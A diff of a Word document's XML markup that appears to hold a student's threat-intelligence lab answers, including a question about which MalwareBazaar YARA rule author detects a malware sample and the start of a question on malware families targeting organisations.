+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">YARA </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>rules</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>are</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>designed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identify</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>specific</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>patterns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>behaviors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Using</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>MalwareBazaar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>what's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the YARA </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>rule</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>created</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>by</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "" </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>that</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>detects</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identified</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> malware?Varp0s</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="018583E4" wp14:editId="2F6058B0">
+            <wp:extent cx="5943600" cy="2838450"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1181580979" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1181580979" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -2955,7 +4799,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2850515"/>
+                      <a:ext cx="5943600" cy="2838450"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2967,14 +4811,6 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3028,7 +4864,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Q5</w:t>
+        <w:t>Q8</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3046,140 +4882,98 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>By</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>examining</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the MITRE ATT&amp;CK </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>techniques</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>displayed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in the </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>Any.run</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> </w:t>
-        </w:r>
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>sandbox</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> </w:t>
-        </w:r>
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>report</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>identify</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>Understanding</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>which</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>families</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>are</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>targeting</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -3197,70 +4991,286 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>main</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> MITRE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>technique</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>not</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>sub-techniques</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) the </w:t>
+        <w:t>organization</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>helps</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>strategic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
